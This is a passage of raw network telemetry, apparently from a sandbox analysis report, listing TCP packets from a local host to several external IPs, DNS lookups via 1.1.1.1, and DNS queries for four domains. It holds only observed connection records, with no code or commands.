                                                    Jul 1, 2024 15:45:49.918561935 CEST804973038.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:50.833156109 CEST804973038.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:50.833177090 CEST804973038.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:50.833362103 CEST4973080192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:50.835947990 CEST4973080192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:50.840751886 CEST804973038.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:55.896076918 CEST4973180192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:55.901230097 CEST80497313.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:55.901325941 CEST4973180192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:55.906254053 CEST4973180192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:55.911072016 CEST80497313.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:56.379163027 CEST80497313.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:56.379236937 CEST4973180192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:57.414556980 CEST4973180192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:57.420281887 CEST80497313.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:58.432920933 CEST4973280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:58.440716028 CEST80497323.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:58.440799952 CEST4973280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:58.443218946 CEST4973280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:58.449779034 CEST80497323.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:58.924812078 CEST80497323.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:58.924880981 CEST4973280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:59.958059072 CEST4973280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:59.963169098 CEST80497323.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:46:00.964242935 CEST4973380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:46:00.969233990 CEST80497333.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:46:00.969455957 CEST4973380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:46:00.973404884 CEST4973380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:46:00.978260994 CEST80497333.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:46:00.978410959 CEST80497333.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:46:01.437695026 CEST80497333.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:46:01.437983036 CEST4973380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:46:02.476334095 CEST4973380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:46:02.481739998 CEST80497333.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:46:03.494580984 CEST4973480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:46:03.499454021 CEST80497343.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:46:03.499638081 CEST4973480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:46:03.504300117 CEST4973480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:46:03.509058952 CEST80497343.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:46:03.969911098 CEST80497343.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:46:03.969971895 CEST80497343.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:46:03.970139027 CEST4973480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:46:03.972657919 CEST4973480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:46:03.977473974 CEST80497343.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:46:09.060298920 CEST4973580192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:09.065350056 CEST804973581.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:09.070369959 CEST4973580192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:09.076381922 CEST4973580192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:09.081340075 CEST804973581.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:09.794313908 CEST804973581.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:09.794517994 CEST804973581.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:09.794722080 CEST4973580192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:10.585243940 CEST4973580192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:11.604520082 CEST4973680192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:11.746018887 CEST804973681.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:11.746243954 CEST4973680192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:11.750438929 CEST4973680192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:11.755618095 CEST804973681.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:12.421789885 CEST804973681.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:12.421966076 CEST804973681.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:12.422010899 CEST4973680192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:13.257270098 CEST4973680192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:14.276464939 CEST4973780192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:14.281549931 CEST804973781.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:14.281632900 CEST4973780192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:14.283866882 CEST4973780192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:14.288721085 CEST804973781.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:14.288813114 CEST804973781.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:14.980087996 CEST804973781.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:14.980262995 CEST804973781.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:14.980333090 CEST4973780192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:15.788503885 CEST4973780192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:16.808140993 CEST4973880192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:16.813605070 CEST804973881.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:16.813746929 CEST4973880192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:16.815717936 CEST4973880192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:16.821367979 CEST804973881.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:17.502912998 CEST804973881.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:17.503252029 CEST804973881.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:17.508502960 CEST4973880192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:17.510845900 CEST4973880192.168.2.881.88.48.71
                                                    Jul 1, 2024 15:46:17.515680075 CEST804973881.88.48.71192.168.2.8
                                                    Jul 1, 2024 15:46:22.561000109 CEST4973980192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:22.566081047 CEST804973938.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:22.566165924 CEST4973980192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:22.568198919 CEST4973980192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:22.573276997 CEST804973938.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:23.513964891 CEST804973938.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:23.514019012 CEST804973938.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:23.516520977 CEST4973980192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:24.072320938 CEST4973980192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:25.092314959 CEST4974080192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:25.097243071 CEST804974038.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:25.098606110 CEST4974080192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:25.104338884 CEST4974080192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:25.109143019 CEST804974038.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:26.002897024 CEST804974038.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:26.002991915 CEST804974038.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:26.004498005 CEST4974080192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:26.616544008 CEST4974080192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:27.635502100 CEST4974180192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:27.642998934 CEST804974138.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:27.644424915 CEST4974180192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:27.648333073 CEST4974180192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:27.653489113 CEST804974138.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:27.653547049 CEST804974138.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:28.541544914 CEST804974138.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:28.541716099 CEST804974138.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:28.541764975 CEST4974180192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:29.152334929 CEST4974180192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:30.167232990 CEST4974280192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:30.172240019 CEST804974238.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:30.172329903 CEST4974280192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:30.174475908 CEST4974280192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:30.179285049 CEST804974238.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:31.108263969 CEST804974238.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:31.108376980 CEST804974238.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:31.108704090 CEST4974280192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:31.114332914 CEST4974280192.168.2.838.47.207.94
                                                    Jul 1, 2024 15:46:31.119771004 CEST804974238.47.207.94192.168.2.8
                                                    Jul 1, 2024 15:46:36.495665073 CEST4974380192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:36.501158953 CEST804974335.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:36.501241922 CEST4974380192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:36.503489017 CEST4974380192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:36.508477926 CEST804974335.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:37.154994965 CEST804974335.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:37.158318043 CEST804974335.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:37.158636093 CEST804974335.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:37.163849115 CEST4974380192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:38.007925034 CEST4974380192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:39.025598049 CEST4974480192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:39.030639887 CEST804974435.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:39.030853987 CEST4974480192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:39.032617092 CEST4974480192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:39.037492990 CEST804974435.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:39.689910889 CEST804974435.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:39.692758083 CEST804974435.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:39.692773104 CEST804974435.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:39.692953110 CEST4974480192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:40.549835920 CEST4974480192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:41.556787968 CEST4974580192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:41.566216946 CEST804974535.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:41.566370964 CEST4974580192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:41.568326950 CEST4974580192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:41.574748993 CEST804974535.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:41.574928045 CEST804974535.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:42.231754065 CEST804974535.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:42.234688044 CEST804974535.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:42.234738111 CEST4974580192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:42.234843969 CEST804974535.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:42.234898090 CEST4974580192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:43.069824934 CEST4974580192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:44.088249922 CEST4974680192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:44.095391035 CEST804974635.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:44.095495939 CEST4974680192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:44.099317074 CEST4974680192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:44.104367018 CEST804974635.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:44.742984056 CEST804974635.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:44.756393909 CEST804974635.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:44.756422997 CEST804974635.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:44.756434917 CEST804974635.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:44.756464958 CEST4974680192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:44.756506920 CEST4974680192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:44.756566048 CEST804974635.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:44.756586075 CEST804974635.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:44.756666899 CEST4974680192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:44.756923914 CEST804974635.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:44.756975889 CEST4974680192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:44.760094881 CEST4974680192.168.2.835.241.41.54
                                                    Jul 1, 2024 15:46:44.764897108 CEST804974635.241.41.54192.168.2.8
                                                    Jul 1, 2024 15:46:49.943403959 CEST4974780192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:49.948236942 CEST804974776.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:49.948463917 CEST4974780192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:49.951397896 CEST4974780192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:49.956239939 CEST804974776.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:50.428261995 CEST804974776.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:50.428694010 CEST804974776.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:50.428710938 CEST804974776.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:50.428765059 CEST4974780192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:50.428765059 CEST4974780192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:51.462567091 CEST4974780192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:52.480623007 CEST4974880192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:52.485611916 CEST804974876.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:52.485696077 CEST4974880192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:52.487907887 CEST4974880192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:52.492748022 CEST804974876.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:52.961931944 CEST804974876.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:52.961945057 CEST804974876.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:52.962008953 CEST4974880192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:52.963485956 CEST804974876.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:52.963541985 CEST4974880192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:53.991512060 CEST4974880192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:55.010360956 CEST4974980192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:55.015340090 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:55.015430927 CEST4974980192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:55.017518044 CEST4974980192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:55.022440910 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:55.022492886 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:56.093729973 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:56.093740940 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:56.093749046 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:56.093759060 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:56.093828917 CEST4974980192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:56.093946934 CEST4974980192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:56.094387054 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:56.094847918 CEST4974980192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:56.522799015 CEST4974980192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:57.541524887 CEST4975080192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:57.546492100 CEST804975076.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:57.546632051 CEST4975080192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:57.548335075 CEST4975080192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:57.553231001 CEST804975076.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:58.032965899 CEST804975076.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:58.032979012 CEST804975076.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:58.032989025 CEST804975076.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:58.033226967 CEST4975080192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:58.036365032 CEST4975080192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:58.041136026 CEST804975076.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:47:03.059181929 CEST4975180192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:03.064106941 CEST80497513.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:03.064186096 CEST4975180192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:03.065968037 CEST4975180192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:03.070849895 CEST80497513.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:03.562525034 CEST80497513.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:03.562623024 CEST4975180192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:04.569618940 CEST4975180192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:04.574743032 CEST80497513.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:05.588815928 CEST4975280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:05.593719006 CEST80497523.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:05.596601963 CEST4975280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:05.600378036 CEST4975280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:05.605479956 CEST80497523.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:06.994154930 CEST80497523.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:06.994219065 CEST4975280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:07.100996017 CEST4975280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:07.106008053 CEST80497523.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:08.120918036 CEST4975380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:08.125889063 CEST80497533.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:08.125997066 CEST4975380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:08.128249884 CEST4975380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:08.133315086 CEST80497533.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:08.133322001 CEST80497533.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:08.607781887 CEST80497533.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:08.607858896 CEST4975380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:09.632149935 CEST4975380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:09.637073994 CEST80497533.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:10.650904894 CEST4975480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:10.655893087 CEST80497543.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:10.655956030 CEST4975480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:10.657994032 CEST4975480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:10.662827969 CEST80497543.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:12.043147087 CEST80497543.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:12.043167114 CEST80497543.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:12.043293953 CEST4975480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:12.046474934 CEST4975480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:47:12.051214933 CEST80497543.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:47:17.378566980 CEST4975580192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:17.383482933 CEST804975535.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:17.383625984 CEST4975580192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:17.385404110 CEST4975580192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:17.390348911 CEST804975535.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:18.029994965 CEST804975535.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:18.033622980 CEST804975535.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:18.033754110 CEST4975580192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:18.033766031 CEST804975535.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:18.033915043 CEST4975580192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:18.897802114 CEST4975580192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:19.916774035 CEST4975680192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:19.921710968 CEST804975635.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:19.921838045 CEST4975680192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:19.923675060 CEST4975680192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:19.928694963 CEST804975635.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:20.593511105 CEST804975635.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:20.595818996 CEST804975635.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:20.595835924 CEST804975635.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:20.595905066 CEST4975680192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:21.429239988 CEST4975680192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:22.450575113 CEST4975780192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:22.455451012 CEST804975735.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:22.455513000 CEST4975780192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:22.457798958 CEST4975780192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:22.462673903 CEST804975735.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:22.462749004 CEST804975735.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:23.099662066 CEST804975735.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:23.103111982 CEST804975735.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:23.103161097 CEST4975780192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:23.104454994 CEST804975735.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:23.104510069 CEST4975780192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:23.964395046 CEST4975780192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:24.979453087 CEST4975880192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:24.984754086 CEST804975835.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:24.984832048 CEST4975880192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:24.986584902 CEST4975880192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:24.991456985 CEST804975835.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:25.629106045 CEST804975835.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:25.634210110 CEST804975835.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:25.634257078 CEST804975835.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:25.634268999 CEST804975835.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:25.634274006 CEST4975880192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:25.634356022 CEST4975880192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:25.634380102 CEST804975835.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:25.634391069 CEST804975835.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:25.634493113 CEST804975835.244.172.47192.168.2.8
                                                    Jul 1, 2024 15:47:25.634520054 CEST4975880192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:25.634599924 CEST4975880192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:25.638479948 CEST4975880192.168.2.835.244.172.47
                                                    Jul 1, 2024 15:47:25.645207882 CEST804975835.244.172.47192.168.2.8

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 1, 2024 15:44:45.799751043 CEST4991353192.168.2.81.1.1.1
                                                    Jul 1, 2024 15:44:45.815962076 CEST53499131.1.1.1192.168.2.8
                                                    Jul 1, 2024 15:45:01.369715929 CEST6389553192.168.2.81.1.1.1
                                                    Jul 1, 2024 15:45:01.544222116 CEST53638951.1.1.1192.168.2.8
                                                    Jul 1, 2024 15:45:15.244791985 CEST6306453192.168.2.81.1.1.1
                                                    Jul 1, 2024 15:45:15.560376883 CEST53630641.1.1.1192.168.2.8
                                                    Jul 1, 2024 15:45:28.791532040 CEST6105653192.168.2.81.1.1.1
                                                    Jul 1, 2024 15:45:28.815490007 CEST53610561.1.1.1192.168.2.8
                                                    Jul 1, 2024 15:45:41.917356968 CEST5624253192.168.2.81.1.1.1
                                                    Jul 1, 2024 15:45:42.284054041 CEST53562421.1.1.1192.168.2.8
                                                    Jul 1, 2024 15:45:55.854392052 CEST6111353192.168.2.81.1.1.1
                                                    Jul 1, 2024 15:45:55.893541098 CEST53611131.1.1.1192.168.2.8
                                                    Jul 1, 2024 15:46:08.987983942 CEST5793353192.168.2.81.1.1.1
                                                    Jul 1, 2024 15:46:09.051515102 CEST53579331.1.1.1192.168.2.8
                                                    Jul 1, 2024 15:46:22.526958942 CEST5079953192.168.2.81.1.1.1
                                                    Jul 1, 2024 15:46:22.558290005 CEST53507991.1.1.1192.168.2.8
                                                    Jul 1, 2024 15:46:36.120467901 CEST6188253192.168.2.81.1.1.1
                                                    Jul 1, 2024 15:46:36.492676020 CEST53618821.1.1.1192.168.2.8
                                                    Jul 1, 2024 15:46:49.786616087 CEST5099753192.168.2.81.1.1.1
                                                    Jul 1, 2024 15:46:49.939966917 CEST53509971.1.1.1192.168.2.8
                                                    Jul 1, 2024 15:47:03.041403055 CEST5217153192.168.2.81.1.1.1
                                                    Jul 1, 2024 15:47:03.056957960 CEST53521711.1.1.1192.168.2.8
                                                    Jul 1, 2024 15:47:17.057301044 CEST5275753192.168.2.81.1.1.1
                                                    Jul 1, 2024 15:47:17.373507977 CEST53527571.1.1.1192.168.2.8

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jul 1, 2024 15:44:45.799751043 CEST192.168.2.81.1.1.10x4ae2Standard query (0)www.evoolihubs.shopA (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:45:01.369715929 CEST192.168.2.81.1.1.10x941dStandard query (0)www.mycaringfriend.onlineA (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:45:15.244791985 CEST192.168.2.81.1.1.10x6462Standard query (0)www.marttyes.topA (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:45:28.791532040 CEST192.168.2.81.1.1.10xfc01Standard query (0)www.sponsoraveteran.infoA (IP address)IN (0x0001)false
